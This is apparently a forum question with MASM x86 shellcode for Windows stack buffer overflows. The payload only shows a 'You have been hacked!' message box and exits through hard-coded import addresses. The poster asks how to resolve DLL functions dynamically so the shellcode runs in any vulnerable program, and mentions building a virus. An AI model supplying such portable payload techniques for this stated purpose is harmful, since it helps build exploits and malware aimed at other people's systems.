I'm programming shellcode for stack buffer overflow vulnerabilities. I have learned about it and read a lot about this vulnerability, and finally I have the ability to exploit it and make the shells.
This is my code:
;+-+-+-+-+[ FileName: shellcode.asm ]+-+-+-+-+-+
.386
.model flat, stdcall
option casemap:none

;+-+-+-+-+ Include Files +-+-+-+-+-+
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc

;+-+-+-+-+ Include Libraries +-+-+-+-+
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

.code
main:
;|=--------------=[ shell code section ]=---------------=|
    push 0                          ; uType: OK button
    jmp _caption                    ; jump over the data, the call below pushes its address
_rCaption:
    jmp _msg
_rMsg:
    push 0                          ; hWnd
    call DWORD PTR DS:[402034h]     ; <=> call MessageBox (hard-coded IAT slot)
    push 0                          ; exit code
    call DWORD PTR DS:[402014h]     ; <=> call ExitProcess (hard-coded IAT slot)

;|=--------------=[ shell data section ]=---------------=|
_caption:
    call _rCaption                  ; <=> push offset caption (return address = string address)
    caption db "ha ha",0
_msg:
    call _rMsg                      ; <=> push offset msg
    msg db "You have been hacked!",0
end main
Now, as you can see, the routines above (MessageBox and ExitProcess) are static, so I must know the addresses of the procedures inside the target program, put them into the shell and assemble it again!! :(
Is there any way to make the shell dynamic? My point is: how do I include the DLL procedures inside the body of the program?
The reason for my question is to make the shell work in any program that has the stack buffer overflow vulnerability, and maybe to make a virus do the same.
Note: I don't accept the solution that makes the shell take the addresses from the import data section of the target program; this can work for the example above but doesn't work with shells that have different DLL procedures.